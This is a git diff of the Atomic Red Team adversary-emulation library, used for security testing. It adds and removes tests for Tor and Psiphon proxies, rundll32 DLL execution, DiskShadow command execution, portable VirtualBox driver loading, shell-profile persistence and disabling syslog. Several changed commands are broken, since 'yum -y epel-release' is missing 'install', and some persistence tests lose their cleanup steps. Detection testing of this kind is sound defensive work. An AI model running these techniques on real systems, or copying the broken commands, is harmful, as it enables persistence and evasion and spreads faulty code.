-  description: |
-    This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
-    Upon successful execution, the tor proxy will be launched, run for 60 seconds, and then exit. 
-  supported_platforms:
-  - windows
-  input_arguments:
-    TorExe:
-      description: Location of tor.exe file.  
-      type: String
-      default: $env:temp\tor\Tor\tor.exe
-  dependency_executor_name: powershell
-  dependencies:
-  - description: |
-      tor.exe must be installed on the machine 
-    prereq_command: |
-      if (Test-Path #{TorExe}) {exit 0} else {exit 1}
-    get_prereq_command: |
-      Start-BitsTransfer -Source "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -Destination "$env:temp\tor.zip" -dynamic
-      expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor"
-  executor:
-    command: |
-     invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'
-     sleep -s 60
-     stop-process -name "tor" | out-null
-    name: powershell
-    elevation_required: false
@@ -1,6 +0,0 @@
-@echo off
-start %USERPROFILE%\Downloads\psiphon3.exe
-timeout /t 20 >nul 2>&1
-Taskkill /IM msedge.exe /F >nul 2>&1
-Taskkill /IM psiphon3.exe /F >nul 2>&1
-Taskkill /IM psiphon-tunnel-core.exe /F >nul 2>&1
@@ -74,7 +74,7 @@ Network Share Discovery using smbstatus
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | package_checker | Package checking command. Debian - dpkg -s samba | String | (rpm -q samba &>/dev/null) || (dpkg -s samba | grep -q installed)|
-| package_installer | Package installer command. Debian - apt install samba | String | (which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)|
+| package_installer | Package installer command. Debian - apt install samba | String | (which yum && yum -y epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)|


 #### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
@@ -32,7 +32,7 @@ atomic_tests:
    package_installer:
      description: Package installer command. Debian - apt install samba
      type: String
-      default: (which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)
+      default: (which yum && yum -y epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)
  dependency_executor_name: bash
  dependencies:
  - description: |
@@ -26,10 +26,6 @@ Rundll32 can also be used to execute scripts such as JavaScript. This can be don

 - [Atomic Test #9 - Execution of non-dll using rundll32.exe](#atomic-test-9---execution-of-non-dll-using-rundll32exe)

- [Atomic Test #10 - Rundll32 with Ordinal Value](#atomic-test-10---rundll32-with-ordinal-value)
-
- [Atomic Test #11 - Rundll32 with Control_RunDLL](#atomic-test-11---rundll32-with-control_rundll)
-

 <br/>

@@ -404,97 +400,4 @@ Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"



-<br/>
-<br/>
-
-## Atomic Test #10 - Rundll32 with Ordinal Value
-Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. 
-Upon successful execution, Calc.exe will spawn.
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| input_url | Url to download the DLL | Url | https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll|
-| input_file | DLL File | String | PathToAtomicsFolder&#92;T1218.010&#92;bin&#92;AllTheThingsx64.dll|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-rundll32.exe #{input_file},#2
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: DLL file must exist on disk at specified location
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{input_file}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - Rundll32 with Control_RunDLL
-Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444.
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** e4c04b6f-c492-4782-82c7-3bf75eb8077e
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| input_url | Url to download the DLL | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll|
-| input_file | DLL File | String | PathToAtomicsFolder&#92;T1047&#92;bin&#92;calc.dll|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-rundll32.exe shell32.dll,Control_RunDLL #{input_file}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: DLL file must exist on disk at specified location
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{input_file}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
-```
-
-
-
-
 <br/>
@@ -195,59 +195,4 @@ atomic_tests:
  executor:
    name: powershell
    command: | 
-      rundll32.exe #{input_file}, StartW
- name: Rundll32 with Ordinal Value
-  auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
-  description: |
-    Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. 
-    Upon successful execution, Calc.exe will spawn.
-  supported_platforms:
-      - windows
-  input_arguments:
-    input_url:
-      description: Url to download the DLL
-      type: Url
-      default: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll
-    input_file:
-      description: DLL File
-      type: String
-      default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll
-  dependency_executor_name: powershell 
-  dependencies: 
-  - description: |
-      DLL file must exist on disk at specified location
-    prereq_command: | 
-      if (Test-Path #{input_file}) {exit 0} else {exit 1}
-    get_prereq_command: | 
-      Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
-  executor:
-    name: command_prompt
-    command: | 
-      rundll32.exe #{input_file},#2
- name: Rundll32 with Control_RunDLL
-  auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e
-  description: |
-    Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444. 
-  supported_platforms:
-      - windows
-  input_arguments:
-    input_url:
-      description: Url to download the DLL
-      type: Url
-      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
-    input_file:
-      description: DLL File
-      type: String
-      default: PathToAtomicsFolder\T1047\bin\calc.dll
-  dependency_executor_name: powershell 
-  dependencies: 
-  - description: |
-      DLL file must exist on disk at specified location
-    prereq_command: | 
-      if (Test-Path #{input_file}) {exit 0} else {exit 1}
-    get_prereq_command: | 
-      Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
-  executor:
-    name: command_prompt
-    command: | 
-      rundll32.exe shell32.dll,Control_RunDLL #{input_file}
+      rundll32.exe #{input_file}, StartW
@@ -20,8 +20,6 @@

 - [Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test](#atomic-test-8---invoke-athremotefxvgpudisablementcommand-base-test)

- [Atomic Test #9 - DiskShadow Command Execution](#atomic-test-9---diskshadow-command-execution)
-

 <br/>

@@ -394,60 +392,4 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force



-<br/>
-<br/>
-
-## Atomic Test #9 - DiskShadow Command Execution
-Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 0e1483ba-8f0c-425d-b8c6-42736e058eaa
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| txt_payload | txt to execute | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;T1218.txt|
-| dspath | Default location of DiskShadow.exe | Path | C:&#92;Windows&#92;System32&#92;diskshadow.exe|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-#{dspath} -S #{txt_payload}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: txt file must exist on disk at specified location (#{txt_payload})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{txt_payload}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
-```
-##### Description: DiskShadow.exe must exist on disk at specified location (#{dspath})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dspath}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-echo "DiskShadow.exe not found on disk at expected location"
-```
-
-
-
-
 <br/>
@@ -223,36 +223,3 @@ atomic_tests:
  executor:
    command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}'
    name: powershell
- name: DiskShadow Command Execution
-  auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa
-  description: |
-    Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
-  supported_platforms:
-    - windows
-  input_arguments:
-    txt_payload:
-      description: txt to execute
-      type: Path
-      default: PathToAtomicsFolder\T1218\src\T1218.txt
-    dspath:
-      description: Default location of DiskShadow.exe
-      type: Path
-      default: C:\Windows\System32\diskshadow.exe
-  dependency_executor_name: powershell 
-  dependencies: 
-    - description: txt file must exist on disk at specified location (#{txt_payload})
-      prereq_command: |
-        if (Test-Path #{txt_payload}) {exit 0} else {exit 1}
-      get_prereq_command: |
-        New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null
-        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
-    - description: DiskShadow.exe must exist on disk at specified location (#{dspath})
-      prereq_command: |
-        if (Test-Path #{dspath}) {exit 0} else {exit 1}
-      get_prereq_command: |
-        echo "DiskShadow.exe not found on disk at expected location"
-  executor:
-    command: |
-      #{dspath} -S #{txt_payload} 
-    name: powershell
-    elevation_required: false
@@ -1 +0,0 @@
-EXEC c:\windows\system32\calc.exe
@@ -64,7 +64,7 @@ which_gpg=`which gpg`
 ```
 ##### Get Prereq Commands:
 ```bash
-(which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)
+(which yum && yum -y epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)
 ```


@@ -170,7 +170,7 @@ if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; els
 ```
 ##### Get Prereq Commands:
 ```bash
-(which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)
+(which yum && yum -y epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)
 ```


@@ -32,7 +32,7 @@ atomic_tests:
      prereq_command: |
        which_gpg=`which gpg`
      get_prereq_command: |
-        (which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)
+        (which yum && yum -y epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)
  executor:
    name: bash
    elevation_required: false
@@ -110,7 +110,7 @@ atomic_tests:
        which_ccdecrypt=`which ccdecrypt`
        if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi
      get_prereq_command: |
-        (which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)
+        (which yum && yum -y epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)
  executor:
    name: bash
    elevation_required: false
@@ -30,20 +30,16 @@ Adds a command to the .bash_profile file of the current user
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| command_to_add | Command to add to the .bash_profile file | String | echo "Hello from Atomic Red Team T1546.004"|
+| command_to_add | Command to add to the .bash_profile file | String | /path/to/script.py|


 #### Attack Commands: Run with `sh`! 


 ```sh
-echo '#{command_to_add}' >> ~/.bash_profile
+echo "#{command_to_add}" >> ~/.bash_profile
 ```

-#### Cleanup Commands:
-```sh
-sed -i '/#{command_to_add}/d' ~/.bash_profile
-```



@@ -67,20 +63,16 @@ Adds a command to the .bashrc file of the current user
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| command_to_add | Command to add to the .bashrc file | String | echo "Hello from Atomic Red Team T1546.004"|
+| command_to_add | Command to add to the .bashrc file | String | /path/to/script.py|


 #### Attack Commands: Run with `sh`! 


 ```sh
-echo '#{command_to_add}' >> ~/.bashrc
+echo "#{command_to_add}" >> ~/.bashrc
 ```

-#### Cleanup Commands:
-```sh
-sed -i '/#{command_to_add}/d' ~/.bashrc
-```



@@ -12,12 +12,10 @@ atomic_tests:
    command_to_add:
      description: Command to add to the .bash_profile file
      type: String
-      default: echo "Hello from Atomic Red Team T1546.004"
+      default: /path/to/script.py
  executor:
    command: |
-      echo '#{command_to_add}' >> ~/.bash_profile
-    cleanup_command: |
-      sed -i '/#{command_to_add}/d' ~/.bash_profile
+      echo "#{command_to_add}" >> ~/.bash_profile
    name: sh
 - name: Add command to .bashrc
  auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
@@ -30,10 +28,8 @@ atomic_tests:
    command_to_add:
      description: Command to add to the .bashrc file
      type: String
-      default: echo "Hello from Atomic Red Team T1546.004"
+      default: /path/to/script.py
  executor:
    command: |
-      echo '#{command_to_add}' >> ~/.bashrc
-    cleanup_command: |
-      sed -i '/#{command_to_add}/d' ~/.bashrc
+      echo "#{command_to_add}" >> ~/.bashrc
    name: sh
@@ -283,7 +283,7 @@ if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; el
 ```
 ##### Get Prereq Commands:
 ```sh
-(which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip)
+(which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip)
 echo Please set input_files argument to include files that exist
 ```

@@ -427,7 +427,7 @@ if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```sh
-(which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)
+(which yum && yum -y epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)
 ```


@@ -175,7 +175,7 @@ atomic_tests:
      prereq_command: |
        if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi;
      get_prereq_command: |
-        (which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip)
+        (which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip)
        echo Please set input_files argument to include files that exist
  executor:
    name: sh
@@ -263,7 +263,7 @@ atomic_tests:
      prereq_command: |
        if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi;
      get_prereq_command: |
-        (which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)
+        (which yum && yum -y epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)
  executor:
    name: sh
    elevation_required: false
@@ -77,7 +77,7 @@ Disables syslog collection
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | package_checker | Package checking command for linux. | String | (rpm -q rsyslog 2>&1 >/dev/null) || (dpkg -s rsyslog | grep -q installed)|
-| package_installer | Package installer command for linux. Default yum | String | (which yum && yum -y install epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog)|
+| package_installer | Package installer command for linux. Default yum | String | (which yum && yum -y epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog)|
 | flavor_command | Command to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog | String | systemctl stop rsyslog ; systemctl disable rsyslog|
 | cleanup_command | Command to enable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog start ; chkconfig rsyslog on | String | systemctl start rsyslog ; systemctl enable rsyslog|

@@ -15,7 +15,7 @@ atomic_tests:
    package_installer:
      description: Package installer command for linux. Default yum
      type: String
-      default: (which yum && yum -y install epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog)
+      default: (which yum && yum -y epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog)
    flavor_command:
      description: Command to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog
      type: String
@@ -1,89 +0,0 @@
-# T1564.006 - Run Virtual Instance
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1564/006)
-<blockquote>Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
-
-Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)</blockquote>
-
-## Atomic Tests
-
- [Atomic Test #1 - Register Portable Virtualbox](#atomic-test-1---register-portable-virtualbox)
-
-
-<br/>
-
-## Atomic Test #1 - Register Portable Virtualbox
-ransomware payloads via virtual machines (VM). 
-[Maze ransomware](https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/)
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** c59f246a-34f8-4e4d-9276-c295ef9ba0dd
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| msi_file_path | Path to the MSI file | Path | PathToAtomicsFolder&#92;T1564.006&#92;bin&#92;Virtualbox_52.msi|
-| cab_file_path | Path to the CAB file | Path | PathToAtomicsFolder&#92;T1564.006&#92;bin&#92;common.cab|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-"C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe" /reregserver
-regsvr32 /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
-rundll32 "C:\Program Files\Oracle\VirtualBox\VBoxRT.dll,RTR3Init"
-sc create VBoxDRV binpath= "C:\Program Files\Oracle\VirtualBox\drivers\VboxDrv.sys" type= kernel start= auto error= normal displayname= PortableVBoxDRV
-sc start VBoxDRV
-```
-
-#### Cleanup Commands:
-```cmd
-sc stop VBoxDRV
-sc delete VBoxDRV
-regsvr32 /u /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
-msiexec /x #{msi_file_path} /qn
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: MSI file must exist on disk at specified location (#{msi_file_path})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{msi_file_path}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{msi_file_path}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}"
-```
-##### Description: CAB file must exist on disk at specified location (#{cab_file_path})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{cab_file_path}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{cab_file_path}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab" -OutFile "#{cab_file_path}"
-```
-##### Description: Old version of Virtualbox must be installed
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "C:\Program Files\Oracle\VirtualBox\VboxC.dll") {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-msiexec /i #{msi_file_path} /qn
-```
-
-
-
-
-<br/>
@@ -1,55 +0,0 @@
-attack_technique: T1564.006
-display_name: "Run Virtual Instance"
-atomic_tests:
- name: Register Portable Virtualbox
-  auto_generated_guid: c59f246a-34f8-4e4d-9276-c295ef9ba0dd
-  description: |
-    ransomware payloads via virtual machines (VM). 
-    [Maze ransomware](https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/)
-  supported_platforms:
-  - windows
-  input_arguments:
-    msi_file_path:
-      description: Path to the MSI file
-      type: Path
-      default: PathToAtomicsFolder\T1564.006\bin\Virtualbox_52.msi
-    cab_file_path:
-      description: Path to the CAB file
-      type: Path
-      default: PathToAtomicsFolder\T1564.006\bin\common.cab
-  dependency_executor_name: powershell
-  dependencies:
-  - description: |
-      MSI file must exist on disk at specified location (#{msi_file_path})
-    prereq_command: |
-      if (Test-Path #{msi_file_path}) {exit 0} else {exit 1}
-    get_prereq_command: |
-      New-Item -Type Directory (split-path #{msi_file_path}) -ErrorAction ignore | Out-Null
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}"
-  - description: |
-      CAB file must exist on disk at specified location (#{cab_file_path})
-    prereq_command: |
-      if (Test-Path #{cab_file_path}) {exit 0} else {exit 1}
-    get_prereq_command: |
-      New-Item -Type Directory (split-path #{cab_file_path}) -ErrorAction ignore | Out-Null
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab" -OutFile "#{cab_file_path}" 
-  - description: |
-      Old version of Virtualbox must be installed
-    prereq_command: |
-      if (Test-Path "C:\Program Files\Oracle\VirtualBox\VboxC.dll") {exit 0} else {exit 1}
-    get_prereq_command: |
-      msiexec /i #{msi_file_path} /qn
-  executor:
-    command: |
-      "C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe" /reregserver
-      regsvr32 /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
-      rundll32 "C:\Program Files\Oracle\VirtualBox\VBoxRT.dll,RTR3Init"
-      sc create VBoxDRV binpath= "C:\Program Files\Oracle\VirtualBox\drivers\VboxDrv.sys" type= kernel start= auto error= normal displayname= PortableVBoxDRV
-      sc start VBoxDRV
-    cleanup_command: |
-      sc stop VBoxDRV
-      sc delete VBoxDRV
-      regsvr32 /u /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
-      msiexec /x #{msi_file_path} /qn
-    name: command_prompt
-
@@ -862,14 +862,3 @@ ae3a8605-b26e-457c-b6b3-2702fd335bac
 4449c89b-ec82-43a4-89c1-91e2f1abeecc
 48117158-d7be-441b-bc6a-d9e36e47b52b
 178136d8-2778-4d7a-81f3-d517053a4fd6
-d0c81167-803d-4dca-99b4-7ce65e7b257c
-46274fc6-08a7-4956-861b-24cbbaa0503c
-a2b35a63-9df1-4806-9a4d-5fe0500845f2
-962a6017-1c09-45a6-880b-adc9c57cb22e
-9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
-21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
-e4c04b6f-c492-4782-82c7-3bf75eb8077e
-c59f246a-34f8-4e4d-9276-c295ef9ba0dd
-14d55ca0-920e-4b44-8425-37eedd72b173
-7b9d85e5-c4ce-4434-8060-d3de83595e69
-0e1483ba-8f0c-425d-b8c6-42736e058eaa
Author	SHA1	Message	Date
patel-bhavin	2dd769d9be	revert_id	2022-02-07 16:23:02 -08:00
patel-bhavin	27f3e17155	Merge branch 'AutoSUID_linux' of github.com:redcanaryco/atomic-red-team into AutoSUID_linux	2022-02-07 12:28:24 -08:00
patel-bhavin	72b3e05233	remove uuid	2022-02-07 12:28:09 -08:00
Bhavin Patel	a47bc9f742	Merge branch 'master' into AutoSUID_linux	2022-02-07 12:23:51 -08:00
patel-bhavin	d18666e8f8	uuid	2022-02-07 12:23:34 -08:00
patel-bhavin	aa504f2b42	minor	2022-02-07 12:15:12 -08:00
patel-bhavin	a6f43cc194	linenum tool	2022-02-04 16:26:47 -08:00
patel-bhavin	dfa63a2977	updates to rpre reg	2022-02-04 12:55:31 -08:00
patel-bhavin	4332495289	AutoSUID exeuction	2022-02-04 12:14:27 -08:00